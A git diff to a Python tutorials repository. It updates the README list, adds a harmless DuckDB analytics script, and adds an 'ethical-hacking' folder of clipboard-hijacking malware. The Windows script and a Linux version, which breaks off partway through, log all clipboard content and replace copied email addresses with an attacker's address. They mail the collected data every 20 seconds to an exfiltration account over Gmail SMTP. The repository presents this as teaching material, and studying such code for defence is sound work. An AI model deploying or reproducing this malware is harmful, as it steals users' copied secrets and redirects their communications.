diff --git a/README.md b/README.md
index 81442a70..c298a644 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,13 @@
-![alt text](images/python_logo.ico) 
+<p align="center">
+  <a href="https://codingfleet.com/code-generator/python/?utm_source=github-repo&utm_medium=banner-2">
+    <img src="images/codingfleet-banner-2.png" alt="CodingFleet Code Generator" width="350" height="350">
+  </a><a href="https://codingfleet.com/code-converter/python/?utm_source=github-repo&utm_medium=banner-3">
+    <img src="images/codingfleet-banner-3.png" alt="CodingFleet Code Converter" width="350" height="350">
+  </a>
+</p>
+
+
+
 # Python Code Tutorials
 This is a repository of all the tutorials of [The Python Code](https://www.thepythoncode.com) website.
 ## List of Tutorials
@@ -19,6 +28,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
         - [How to Perform IP Address Spoofing in Python](https://thepythoncode.com/article/make-an-ip-spoofer-in-python-using-scapy). ([code](scapy/ip-spoofer))
         - [How to See Hidden Wi-Fi Networks in Python](https://thepythoncode.com/article/uncovering-hidden-ssids-with-scapy-in-python). ([code](scapy/uncover-hidden-wifis))
         - [Crafting Dummy Packets with Scapy Using Python](https://thepythoncode.com/article/crafting-packets-with-scapy-in-python). ([code](scapy/crafting-packets))
+        - [Building a Honeypot Defense System with Python and Scapy](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system). ([code](scapy/honeypot-defense-system))
     - [Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))
     - [Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))
     - [How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python). ([code](ethical-hacking/reverse_shell))
@@ -73,6 +83,8 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Perform Reverse DNS Lookups Using Python](https://thepythoncode.com/article/reverse-dns-lookup-with-python). ([code](ethical-hacking/reverse-dns-lookup))
     - [How to Make a Clickjacking Vulnerability Scanner in Python](https://thepythoncode.com/article/make-a-clickjacking-vulnerability-scanner-with-python). ([code](ethical-hacking/clickjacking-scanner))
     - [How to Build a Custom NetCat with Python](https://thepythoncode.com/article/create-a-custom-netcat-in-python). ([code](ethical-hacking/custom-netcat/))
+    - [Building a ClipBoard Hijacking Malware with Python](https://thepythoncode.com/article/build-a-clipboard-hijacking-tool-with-python). ([code](ethical-hacking/clipboard-hijacking-tool))
+    - [How to Build a Website Blocker in Python](https://www.thepythoncode.com/article/build-website-blocker-python). ([code](ethical-hacking/website-blocker))
 
 - ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
     - ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)
@@ -96,6 +108,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
         - [Word Error Rate in Python](https://www.thepythoncode.com/article/calculate-word-error-rate-in-python). ([code](machine-learning/nlp/wer-score))
         - [How to Calculate ROUGE Score in Python](https://www.thepythoncode.com/article/calculate-rouge-score-in-python). ([code](machine-learning/nlp/rouge-score))
         - [Visual Question Answering with Transformers](https://www.thepythoncode.com/article/visual-question-answering-with-transformers-in-python). ([code](machine-learning/visual-question-answering))
+        - [Building a Full-Stack RAG Chatbot with FastAPI, OpenAI, and Streamlit](https://thepythoncode.com/article/build-rag-chatbot-fastapi-openai-streamlit). ([code](https://github.com/mahdjourOussama/python-learning/tree/master/chatbot-rag))
     - ### [Computer Vision](https://www.thepythoncode.com/topic/computer-vision)
         - [How to Detect Human Faces in Python using OpenCV](https://www.thepythoncode.com/article/detect-faces-opencv-python). ([code](machine-learning/face_detection))
         - [How to Make an Image Classifier in Python using TensorFlow and Keras](https://www.thepythoncode.com/article/image-classification-keras-python). ([code](machine-learning/image-classifier))
@@ -134,6 +147,8 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Predict Stock Prices in Python using TensorFlow 2 and Keras](https://www.thepythoncode.com/article/stock-price-prediction-in-python-using-tensorflow-2-and-keras). ([code](machine-learning/stock-prediction))
     - [How to Convert Text to Speech in Python](https://www.thepythoncode.com/article/convert-text-to-speech-in-python). ([code](machine-learning/text-to-speech))
     - [How to Perform Voice Gender Recognition using TensorFlow in Python](https://www.thepythoncode.com/article/gender-recognition-by-voice-using-tensorflow-in-python). ([code](https://github.com/x4nth055/gender-recognition-by-voice))
+ - [How to Build a Semantic Search Engine with FAISS and Sentence Transformers in Python](https://www.thepythoncode.com/article/semantic-search-engine-faiss-python). ([code](machine-learning/semantic-search-faiss))
+ - [How to Generate and Visualize Text Embeddings in Python](https://www.thepythoncode.com/article/generate-visualize-text-embeddings-python). ([code](machine-learning/text-embeddings-visualization))
     - [Introduction to Finance and Technical Indicators with Python](https://www.thepythoncode.com/article/introduction-to-finance-and-technical-indicators-with-python). ([code](machine-learning/technical-indicators))
     - [Algorithmic Trading with FXCM Broker in Python](https://www.thepythoncode.com/article/trading-with-fxcm-broker-using-fxcmpy-library-in-python). ([code](machine-learning/trading-with-fxcm))
     - [How to Create Plots With Plotly In Python](https://www.thepythoncode.com/article/creating-dynamic-plots-with-plotly-visualization-tool-in-python). ([code](machine-learning/plotly-visualization))
@@ -178,6 +193,9 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Query the Ethereum Blockchain with Python](https://www.thepythoncode.com/article/query-ethereum-blockchain-with-python). ([code](general/query-ethereum))
     - [Data Cleaning with Pandas in Python](https://www.thepythoncode.com/article/data-cleaning-using-pandas-in-python). ([code](general/data-cleaning-pandas))
     - [How to Minify CSS with Python](https://www.thepythoncode.com/article/minimize-css-files-in-python). ([code](general/minify-css))
+ - [How to Build a File Deduplication Tool in Python](https://www.thepythoncode.com/article/file-deduplication-tool-python). ([code](general/file-deduplication-tool))
+    - [Build a real MCP client and server in Python with FastMCP (Todo Manager example)](https://www.thepythoncode.com/article/fastmcp-mcp-client-server-todo-manager). ([code](general/fastmcp-mcp-client-server-todo-manager))
+    - [How to Automate Excel Reports in Python using Openpyxl](https://www.thepythoncode.com/article/automate-excel-reports-python-openpyxl). ([code](general/sales-report-generator))
 
     
     
@@ -200,6 +218,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Extract Google Trends Data in Python](https://www.thepythoncode.com/article/extract-google-trends-data-in-python). ([code](web-scraping/extract-google-trends-data))
     - [How to Make a YouTube Video Downloader in Python](https://www.thepythoncode.com/article/make-a-youtube-video-downloader-in-python). ([code](web-scraping/youtube-video-downloader))
     - [How to Build a YouTube Audio Downloader in Python](https://www.thepythoncode.com/article/build-a-youtube-mp3-downloader-tkinter-python). ([code](web-scraping/youtube-mp3-downloader))
+    - [YouTube Video Transcription Summarization with Python](https://thepythoncode.com/article/youtube-video-transcription-and-summarization-with-python). ([code](web-scraping/youtube-transcript-summarizer/))
 
 - ### [Python Standard Library](https://www.thepythoncode.com/topic/python-standard-library)
     - [How to Transfer Files in the Network using Sockets in Python](https://www.thepythoncode.com/article/send-receive-files-using-sockets-python). ([code](general/transfer-files/))
@@ -248,6 +267,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Use MySQL Database in Python](https://www.thepythoncode.com/article/using-mysql-database-in-python). ([code](database/mysql-connector))
     - [How to Connect to a Remote MySQL Database in Python](https://www.thepythoncode.com/article/connect-to-a-remote-mysql-server-in-python). ([code](database/connect-to-remote-mysql-server))
     - [How to Use MongoDB Database in Python](https://www.thepythoncode.com/article/introduction-to-mongodb-in-python). ([code](database/mongodb-client))
+ - [SQL Analytics at Lightning Speed: Getting Started with DuckDB in Python](https://www.thepythoncode.com/article/duckdb-python-getting-started). ([code](database/duckdb-python))
 
 - ### [Handling PDF Files](https://www.thepythoncode.com/topic/handling-pdf-files)
     - [How to Extract All PDF Links in Python](https://www.thepythoncode.com/article/extract-pdf-links-with-python). ([code](web-scraping/pdf-url-extractor))
@@ -285,6 +305,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Compress Images in Python](https://www.thepythoncode.com/article/compress-images-in-python). ([code](python-for-multimedia/compress-image))
     - [How to Remove Metadata from an Image in Python](https://thepythoncode.com/article/how-to-clear-image-metadata-in-python). ([code](python-for-multimedia/remove-metadata-from-images))
     - [How to Create Videos from Images in Python](https://thepythoncode.com/article/create-a-video-from-images-opencv-python). ([code](python-for-multimedia/create-video-from-images))
+    - [How to Recover Deleted Files with Python](https://thepythoncode.com/article/how-to-recover-deleted-file-with-python). ([code](python-for-multimedia/recover-deleted-files))
 
 - ### [Web Programming](https://www.thepythoncode.com/topic/web-programming)
     - [Detecting Fraudulent Transactions in a Streaming Application using Kafka in Python](https://www.thepythoncode.com/article/detect-fraudulent-transactions-with-apache-kafka-in-python). ([code](general/detect-fraudulent-transactions))
diff --git a/database/duckdb-python/duckdb_tutorial.py b/database/duckdb-python/duckdb_tutorial.py
new file mode 100644
index 00000000..512aa17a
--- /dev/null
+++ b/database/duckdb-python/duckdb_tutorial.py
@@ -0,0 +1,319 @@
+"""
+DuckDB + Python — Complete Tutorial Code
+=========================================
+SQL Analytics at Lightning Speed with DuckDB
+
+Requirements: pip install duckdb pandas polars pyarrow numpy
+
+This script covers:
+  1. Basic DuckDB connection and SQL queries
+  2. Querying CSV files directly (no import needed!)
+  3. DuckDB vs Pandas performance comparison
+  4. Querying Parquet files
+  5. Window functions for ranking
+  6. Hybrid workflow: DuckDB → Pandas → Polars
+  7. Persistent databases (.duckdb files)
+  8. Exporting results to CSV and Parquet
+"""
+import duckdb
+import pandas as pd
+import polars as pl
+import numpy as np
+import time
+import os
+
+print(f"DuckDB version: {duckdb.__version__}")
+
+# ═══════════════════════════════════════════════════════════════
+# 1. GENERATE SAMPLE DATA
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("GENERATING SAMPLE DATA (500K rows)")
+print("=" * 60)
+
+np.random.seed(42)
+n = 500_000
+
+regions = ["North", "South", "East", "West"]
+products = ["Widget A", "Widget B", "Gadget X", "Gadget Y", "Doohickey Z"]
+categories = ["Electronics", "Home", "Office", "Electronics", "Office"]
+
+df_sales = pd.DataFrame({
+    "order_id": range(1, n + 1),
+    "region": np.random.choice(regions, n),
+    "product": np.random.choice(products, n),
+    "category": np.random.choice(categories, n),
+    "quantity": np.random.randint(1, 20, n),
+    "unit_price": np.round(np.random.uniform(5, 500, n), 2),
+    "order_date": pd.date_range("2025-01-01", periods=n, freq="90s"),
+})
+
+df_sales["total_amount"] = df_sales["quantity"] * df_sales["unit_price"]
+df_sales["customer_id"] = np.random.randint(1000, 5000, n)
+
+csv_path = "sales_data.csv"
+parquet_path = "sales_data.parquet"
+df_sales.to_csv(csv_path, index=False)
+df_sales.to_parquet(parquet_path, index=False)
+
+csv_size = os.path.getsize(csv_path) / (1024 * 1024)
+pq_size = os.path.getsize(parquet_path) / (1024 * 1024)
+print(f"CSV saved:  {csv_size:.1f} MB ({n:,} rows)")
+print(f"Parquet saved: {pq_size:.1f} MB ({n:,} rows)")
+
+# ═══════════════════════════════════════════════════════════════
+# 2. BASIC DUCKDB: IN-MEMORY CONNECTION
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("BASIC DUCKDB: Creating tables & querying")
+print("=" * 60)
+
+conn = duckdb.connect()  # in-memory database
+
+conn.execute("""
+    CREATE TABLE employees (
+        id INTEGER,
+        name VARCHAR,
+        department VARCHAR,
+        salary DECIMAL(10, 2)
+    )
+""")
+
+conn.execute("""
+    INSERT INTO employees VALUES
+    (1, 'Alice', 'Engineering', 95000),
+    (2, 'Bob', 'Engineering', 87000),
+    (3, 'Charlie', 'Marketing', 72000),
+    (4, 'Diana', 'Marketing', 78000),
+    (5, 'Eve', 'Engineering', 105000),
+    (6, 'Frank', 'Sales', 65000),
+    (7, 'Grace', 'Sales', 71000)
+""")
+
+print("\nAll employees (ordered by salary):")
+print(conn.execute("SELECT * FROM employees ORDER BY salary DESC").fetchdf())
+
+print("\nAverage salary by department:")
+print(conn.execute("""
+    SELECT department,
+           ROUND(AVG(salary), 2) AS avg_salary,
+           COUNT(*) AS headcount
+    FROM employees
+    GROUP BY department
+    ORDER BY avg_salary DESC
+""").fetchdf())
+
+# ═══════════════════════════════════════════════════════════════
+# 3. QUERY CSV DIRECTLY — THE KILLER FEATURE
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("QUERYING CSV DIRECTLY (No pd.read_csv() needed!)")
+print("=" * 60)
+
+t0 = time.time()
+result = conn.execute(f"""
+    SELECT
+        region,
+        category,
+        COUNT(*) AS num_orders,
+        ROUND(SUM(total_amount), 2) AS revenue,
+        ROUND(AVG(total_amount), 2) AS avg_order_value
+    FROM read_csv('{csv_path}', AUTO_DETECT=TRUE)
+    GROUP BY region, category
+    ORDER BY revenue DESC
+    LIMIT 10
+""").fetchdf()
+duckdb_time = time.time() - t0
+print(f"DuckDB direct CSV query: {duckdb_time:.3f}s")
+print(result)
+
+# ═══════════════════════════════════════════════════════════════
+# 4. DUCKDB vs PANDAS — PERFORMANCE SHOWDOWN
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("DUCKDB vs PANDAS — Same query, who wins?")
+print("=" * 60)
+
+t0 = time.time()
+df = pd.read_csv(csv_path)
+pandas_result = (df.groupby(["region", "category"])
+                 .agg(
+                     num_orders=("order_id", "count"),
+                     revenue=("total_amount", "sum"),
+                     avg_order_value=("total_amount", "mean")
+                 )
+                 .sort_values("revenue", ascending=False)
+                 .head(10)
+                 .round(2))
+pandas_time = time.time() - t0
+
+print(f"Pandas read_csv + groupby: {pandas_time:.3f}s")
+print(f"DuckDB direct query:        {duckdb_time:.3f}s")
+print(f"Speedup: {pandas_time/duckdb_time:.1f}x faster with DuckDB!")
+
+# ═══════════════════════════════════════════════════════════════
+# 5. QUERY PARQUET FILES
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("QUERYING PARQUET FILES")
+print("=" * 60)
+
+t0 = time.time()
+result = conn.execute(f"""
+    SELECT
+        product,
+        ROUND(SUM(total_amount), 2) AS total_revenue,
+        COUNT(*) AS units_sold,
+        ROUND(AVG(quantity), 1) AS avg_qty_per_order
+    FROM read_parquet('{parquet_path}')
+    GROUP BY product
+    ORDER BY total_revenue DESC
+""").fetchdf()
+pq_time = time.time() - t0
+print(f"Parquet query: {pq_time:.3f}s")
+print(result)
+
+# ═══════════════════════════════════════════════════════════════
+# 6. WINDOW FUNCTIONS — Top 3 products per region
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("WINDOW FUNCTIONS — Top 3 Products per Region")
+print("=" * 60)
+
+result = conn.execute(f"""
+    WITH ranked AS (
+        SELECT
+            region,
+            product,
+            ROUND(SUM(total_amount), 2) AS revenue,
+            ROW_NUMBER() OVER (
+                PARTITION BY region
+                ORDER BY SUM(total_amount) DESC
+            ) AS rank
+        FROM read_parquet('{parquet_path}')
+        GROUP BY region, product
+    )
+    SELECT * FROM ranked WHERE rank <= 3
+    ORDER BY region, rank
+""").fetchdf()
+print(result)
+
+# ═══════════════════════════════════════════════════════════════
+# 7. HYBRID WORKFLOW: DuckDB → Pandas → Polars
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("HYBRID WORKFLOW: DuckDB → Pandas → Polars")
+print("=" * 60)
+
+# Step 1: DuckDB does the heavy aggregation
+print("Step 1: DuckDB aggregates 500K rows → summary...")
+t0 = time.time()
+summary = conn.execute(f"""
+    SELECT
+        region,
+        category,
+        DATE_TRUNC('month', order_date) AS month,
+        COUNT(*) AS order_count,
+        ROUND(SUM(total_amount), 2) AS monthly_revenue
+    FROM read_parquet('{parquet_path}')
+    GROUP BY region, category, DATE_TRUNC('month', order_date)
+""").fetchdf()
+print(f"   Done in {time.time() - t0:.3f}s → {len(summary)} rows")
+
+# Step 2: Pandas for pivot table
+print("\nStep 2: Pandas pivot table...")
+t0 = time.time()
+pivot = summary.pivot_table(
+    index="month",
+    columns="region",
+    values="monthly_revenue",
+    aggfunc="sum"
+).round(2)
+print(f"   Done in {time.time() - t0:.3f}s")
+print(pivot.head(6))
+
+# Step 3: Polars for final polish
+print("\nStep 3: Polars for final formatting...")
+t0 = time.time()
+pl_df = pl.from_pandas(summary)
+top_month = (pl_df
+             .group_by("region")
+             .agg(pl.col("monthly_revenue").max().alias("best_month_revenue"))
+             .sort("best_month_revenue", descending=True))
+print(f"   Done in {time.time() - t0:.3f}s")
+print(top_month)
+
+# ═══════════════════════════════════════════════════════════════
+# 8. PERSISTENT DATABASE
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("PERSISTENT DATABASE — Save to .duckdb file")
+print("=" * 60)
+
+db_path = "analytics.duckdb"
+persistent_conn = duckdb.connect(db_path)
+
+persistent_conn.execute(f"""
+    CREATE OR REPLACE TABLE sales AS
+    SELECT * FROM read_parquet('{parquet_path}')
+""")
+
+row_count = persistent_conn.execute("SELECT COUNT(*) FROM sales").fetchone()[0]
+db_size = os.path.getsize(db_path) / (1024 * 1024)
+print(f"Database file: {db_path} ({db_size:.1f} MB)")
+print(f"Sales table: {row_count:,} rows persisted")
+
+print("\nTop 5 customers by lifetime value:")
+print(persistent_conn.execute("""
+    SELECT
+        customer_id,
+        COUNT(*) AS orders,
+        ROUND(SUM(total_amount), 2) AS lifetime_value
+    FROM sales
+    GROUP BY customer_id
+    ORDER BY lifetime_value DESC
+    LIMIT 5
+""").fetchdf())
+
+persistent_conn.close()
+
+# ═══════════════════════════════════════════════════════════════
+# 9. EXPORT RESULTS
+# ═══════════════════════════════════════════════════════════════
+print("\n" + "=" * 60)
+print("EXPORTING RESULTS")
+print("=" * 60)
+
+conn.execute(f"""
+    COPY (
+        SELECT region, product, ROUND(SUM(total_amount), 2) AS revenue
+        FROM read_parquet('{parquet_path}')
+        GROUP BY region, product
+        ORDER BY revenue DESC
+    ) TO 'revenue_summary.csv' (HEADER, DELIMITER ',')
+""")
+
+conn.execute(f"""
+    COPY (
+        SELECT region, product, ROUND(SUM(total_amount), 2) AS revenue
+        FROM read_parquet('{parquet_path}')
+        GROUP BY region, product
+        ORDER BY revenue DESC
+    ) TO 'revenue_summary.parquet' (FORMAT PARQUET)
+""")
+
+print("Exported: revenue_summary.csv")
+print("Exported: revenue_summary.parquet")
+
+exported = pd.read_csv("revenue_summary.csv")
+print(f"\nExported CSV preview ({len(exported)} rows):")
+print(exported.head())
+
+# ═══════════════════════════════════════════════════════════════
+# CLEANUP
+# ═══════════════════════════════════════════════════════════════
+conn.close()
+
+print("\n" + "=" * 60)
+print("DONE! All examples completed successfully.")
+print("=" * 60)
diff --git a/ethical-hacking/clipboard-hijacking-tool/README.md b/ethical-hacking/clipboard-hijacking-tool/README.md
new file mode 100644
index 00000000..05a3f405
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/README.md
@@ -0,0 +1,2 @@
+# [Building a ClipBoard Hijacking Malware with Python](https://thepythoncode.com/article/build-a-clipboard-hijacking-tool-with-python)
+This project demonstrates how to create a clipboard hijacking malware using Python. The malware monitors the clipboard for any changes and replaces the copied content with a predefined message or malicious link.
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py
new file mode 100644
index 00000000..0fcbaeb0
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py
@@ -0,0 +1,211 @@
+"""
+Clipboard Email Hijacker with Email Exfiltration
+Monitors clipboard, hijacks emails, and exfiltrates collected data via email
+"""
+
+import win32clipboard
+import re
+from time import sleep, time
+import sys
+import smtplib
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+from datetime import datetime
+
+# Configuration
+ATTACKER_EMAIL = "attacker@attack.com"
+EXFILTRATION_EMAIL = "addyours@gmail.com"
+CHECK_INTERVAL = 1  # seconds between clipboard checks
+SEND_INTERVAL = 20  # seconds between sending collected data
+EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
+
+# Gmail SMTP Configuration
+SMTP_SERVER = "smtp.gmail.com"
+SMTP_PORT = 465  # Using SSL port like the working test
+SMTP_USERNAME = "addyours@gmail.com"
+SMTP_PASSWORD = "add yours"
+
+# Data collection storage
+clipboard_data = []
+hijacked_emails = []
+
+def get_clipboard_text():
+    """Safely get text from clipboard"""
+    try:
+        win32clipboard.OpenClipboard()
+        try:
+            data = win32clipboard.GetClipboardData(win32clipboard.CF_TEXT)
+            if data:
+                return data.decode('utf-8').rstrip()
+            return None
+        except TypeError:
+            # Clipboard doesn't contain text
+            return None
+        finally:
+            win32clipboard.CloseClipboard()
+    except Exception as e:
+        return None
+
+def set_clipboard_text(text):
+    """Safely set clipboard text"""
+    try:
+        win32clipboard.OpenClipboard()
+        win32clipboard.EmptyClipboard()
+        win32clipboard.SetClipboardText(text, win32clipboard.CF_TEXT)
+        win32clipboard.CloseClipboard()
+        return True
+    except Exception as e:
+        try:
+            win32clipboard.CloseClipboard()
+        except:
+            pass
+        return False
+
+def send_exfiltration_email(clipboard_data, hijacked_emails):
+    """Send collected clipboard data via email"""
+    
+    if not clipboard_data and not hijacked_emails:
+        print("[*] No data to exfiltrate, skipping email")
+        return False
+    
+    try:
+        # Create email
+        msg = MIMEMultipart()
+        msg['From'] = SMTP_USERNAME
+        msg['To'] = EXFILTRATION_EMAIL
+        msg['Subject'] = f"Clipboard Data Exfiltration - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}"
+        
+        # Build email body
+        body = "="*60 + "\n"
+        body += "CLIPBOARD DATA EXFILTRATION REPORT\n"
+        body += "="*60 + "\n\n"
+        body += f"Collection Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
+        body += f"Total Items Collected: {len(clipboard_data)}\n"
+        body += f"Total Emails Hijacked: {len(hijacked_emails)}\n"
+        body += "\n" + "="*60 + "\n"
+        
+        # Clipboard data section
+        if clipboard_data:
+            body += "\n--- CLIPBOARD DATA COLLECTED ---\n"
+            body += "\nAll captured clipboard content (comma-separated):\n"
+            body += ", ".join(clipboard_data)
+            body += "\n\n--- DETAILED CLIPBOARD ENTRIES ---\n"
+            for i, item in enumerate(clipboard_data, 1):
+                body += f"{i}. {item}\n"
+        
+        # Hijacked emails section
+        if hijacked_emails:
+            body += "\n" + "="*60 + "\n"
+            body += "--- HIJACKED EMAIL ADDRESSES ---\n\n"
+            body += "Comma-separated list:\n"
+            body += ", ".join(hijacked_emails)
+            body += "\n\nDetailed list:\n"
+            for i, email in enumerate(hijacked_emails, 1):
+                body += f"{i}. {email}\n"
+        
+        body += "\n" + "="*60 + "\n"
+        body += "End of Report\n"
+        body += "="*60 + "\n"
+        
+        msg.attach(MIMEText(body, 'plain'))
+        
+        # Send email using SMTP_SSL (exactly like the working test email)
+        print(f"\n[*] Sending exfiltration email to {EXFILTRATION_EMAIL}...")
+        with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as server:
+            server.login(SMTP_USERNAME, SMTP_PASSWORD)
+            server.send_message(msg)
+        
+        print(f"[+] Successfully sent exfiltration email!")
+        print(f"    - Clipboard items: {len(clipboard_data)}")
+        print(f"    - Hijacked emails: {len(hijacked_emails)}\n")
+        
+        return True
+        
+    except smtplib.SMTPAuthenticationError:
+        print("[ERROR] SMTP Authentication failed!")
+        print("[!] Make sure you're using a Gmail App Password, not your regular password")
+        print("[!] Generate one at: https://myaccount.google.com/apppasswords")
+        return False
+    except Exception as e:
+        print(f"[ERROR] Failed to send email: {e}")
+        import traceback
+        traceback.print_exc()
+        return False
+
+def main():
+    """Main clipboard monitoring loop with periodic exfiltration"""
+    global clipboard_data, hijacked_emails
+    
+    print("="*60)
+    print("Clipboard Email Hijacker with Data Exfiltration")
+    print("="*60)
+    print(f"[+] Target email replacement: {ATTACKER_EMAIL}")
+    print(f"[+] Exfiltration email: {EXFILTRATION_EMAIL}")
+    print(f"[+] Monitoring clipboard every {CHECK_INTERVAL} second(s)")
+    print(f"[+] Sending data every {SEND_INTERVAL} seconds")
+    print("[+] Press Ctrl+C to stop and exit\n")
+    
+    hijack_count = 0
+    last_hijacked = None
+    last_send_time = time()
+    last_clipboard_content = None
+    
+    try:
+        while True:
+            current_time = time()
+            
+            # Get clipboard content
+            data = get_clipboard_text()
+            
+            # Store ALL clipboard content (not just emails)
+            if data and data != last_clipboard_content:
+                clipboard_data.append(data)
+                last_clipboard_content = data
+                print(f"[*] Clipboard captured: {data[:50]}{'...' if len(data) > 50 else ''}")
+            
+            # Check if it's an email and hijack it
+            if data and re.search(EMAIL_REGEX, data):
+                if data != ATTACKER_EMAIL and data != last_hijacked:
+                    print(f"[!] EMAIL DETECTED: {data}")
+                    
+                    # Record the original email before hijacking
+                    hijacked_emails.append(data)
+                    
+                    if set_clipboard_text(ATTACKER_EMAIL):
+                        hijack_count += 1
+                        last_hijacked = data
+                        print(f"[+] REPLACED with: {ATTACKER_EMAIL}")
+                        print(f"[*] Total hijacks: {hijack_count}\n")
+            
+            # Check if it's time to send exfiltration email
+            if current_time - last_send_time >= SEND_INTERVAL:
+                if send_exfiltration_email(clipboard_data, hijacked_emails):
+                    # Clear the data after successful send
+                    clipboard_data = []
+                    hijacked_emails = []
+                    print("[+] Data cleared, starting new collection cycle\n")
+                
+                last_send_time = current_time
+            
+            sleep(CHECK_INTERVAL)
+    
+    except KeyboardInterrupt:
+        print(f"\n\n[+] Ctrl+C detected - Stopping monitoring...")
+        print(f"[*] Total emails hijacked: {hijack_count}")
+        
+        # Send any remaining data before exit
+        if clipboard_data or hijacked_emails:
+            print("\n[*] Sending final exfiltration email with remaining data...")
+            send_exfiltration_email(clipboard_data, hijacked_emails)
+        
+        print("\n[+] Program exited successfully")
+        sys.exit(0)
+        
+    except Exception as e:
+        print(f"\n[ERROR] Unexpected error: {e}")
+        import traceback
+        traceback.print_exc()
+        sys.exit(1)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py
new file mode 100644
index 00000000..d1c78ab1
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py
@@ -0,0 +1,251 @@
+"""
+Clipboard Email Hijacker with Email Exfiltration - Linux Version
+"""
+
+import re
+from time import sleep, time
+import sys
+import smtplib
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+from datetime import datetime
+import subprocess
+import os
+
+# Configuration
+ATTACKER_EMAIL = "attacker@attack.com"
+EXFILTRATION_EMAIL = "ADD YOURS@gmail.com"
+CHECK_INTERVAL = 1  # seconds between clipboard checks
+SEND_INTERVAL = 20  # seconds between sending collected data
+EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
+
+# Gmail SMTP Configuration
+SMTP_SERVER = "smtp.gmail.com"
+SMTP_PORT = 465
+SMTP_USERNAME = "ADD YOURS@gmail.com"
+SMTP_PASSWORD = "ADD Yours"
+
+# Data collection storage
+clipboard_data = []
+hijacked_emails = []
+
+# Detect clipboard tool
+CLIPBOARD_TOOL = None
+if os.system("which xclip > /dev/null 2>&1") == 0:
+    CLIPBOARD_TOOL = "xclip"
+elif os.system("which xsel > /dev/null 2>&1") == 0:
+    CLIPBOARD_TOOL = "xsel"
+elif os.system("which wl-paste > /dev/null 2>&1") == 0:
+    CLIPBOARD_TOOL = "wayland"
+else:
+    print("[ERROR] No clipboard tool found!")
+    print("[!] Install: sudo apt-get install xclip")
+    sys.exit(1)
+
+def get_clipboard_text():
+    """Safely get text from clipboard"""
+    try:
+        if CLIPBOARD_TOOL == "xclip":
+            result = subprocess.run(
+                ["xclip", "-selection", "clipboard", "-o"],
+                capture_output=True,
+                text=True,
+                timeout=2
+            )
+        elif CLIPBOARD_TOOL == "xsel":
+            result = subprocess.run(
+                ["xsel", "--clipboard", "--output"],
+                capture_output=True,
+                text=True,
+                timeout=2
+            )
+        elif CLIPBOARD_TOOL == "wayland":
+            result = subprocess.run(
+                ["wl-paste"],
+                capture_output=True,
+                text=True,
+                timeout=2
+            )
+        else:
+            return None
+        
+        if result.returncode == 0:
+            return result.stdout.rstrip()
+        return None
+    except:
+        return None
+
+def set_clipboard_text(text):
+    """Safely set clipboard text"""
+    try:
+        if CLIPBOARD_TOOL == "xclip":
+            process = subprocess.Popen(
+                ["xclip", "-selection", "clipboard", "-i"],
+                stdin=subprocess.PIPE
+            )
+        elif CLIPBOARD_TOOL == "xsel":
+            process = subprocess.Popen(
+                ["xsel", "--clipboard", "--input"],
+                stdin=subprocess.PIPE
+            )
+        elif CLIPBOARD_TOOL == "wayland":
+            process = subprocess.Popen(
+                ["wl-copy"],
+                stdin=subprocess.PIPE
+            )
+        else:
+            return False
+        
+        process.communicate(input=text.encode('utf-8'), timeout=2)
+        return process.returncode == 0
+    except:
+        return False
+
+def send_exfiltration_email(clipboard_data, hijacked_emails):
+    """Send collected clipboard data via email"""
+    
+    if not clipboard_data and not hijacked_emails:
+        print("[*] No data to exfiltrate, skipping email")
+        return False
+    
+    try:
+        # Create email
+        msg = MIMEMultipart()
+        msg['From'] = SMTP_USERNAME
+        msg['To'] = EXFILTRATION_EMAIL
+        msg['Subject'] = f"Clipboard Data Exfiltration - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}"
+        
+        # Build email body
+        body = "="*60 + "\n"
+        body += "CLIPBOARD DATA EXFILTRATION REPORT\n"
+        body += "="*60 + "\n\n"
